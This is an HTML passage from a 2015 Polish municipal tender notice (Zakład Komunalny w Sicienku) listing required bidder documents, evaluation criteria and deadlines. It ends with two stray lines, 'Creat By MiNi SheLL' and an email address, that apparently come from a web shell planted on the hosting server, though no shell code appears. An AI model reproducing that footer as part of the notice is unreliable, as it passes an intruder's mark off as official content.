<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kopia dowodu wpłaty wadium. 2. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeśli osoba podpisującą nie jest osobą upoważnioną na podstawie dokumentu wymienionego w § 6 pkt. II ppkt.2</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany treści umowy w przypadkach określonych w załączonym do SIWZ projekcie umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zksicienko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Komunalny w Sicienku, ul. Lipowa 1, 86-014 Sicienko, woj. kujawsko-pomorskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2015 godzina 10:00, miejsce: sekretariat Zakładu Komunalnego w Sicienku, ul. Lipowa 1, 86-014 Sicienko, woj. kujawsko-pomorskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com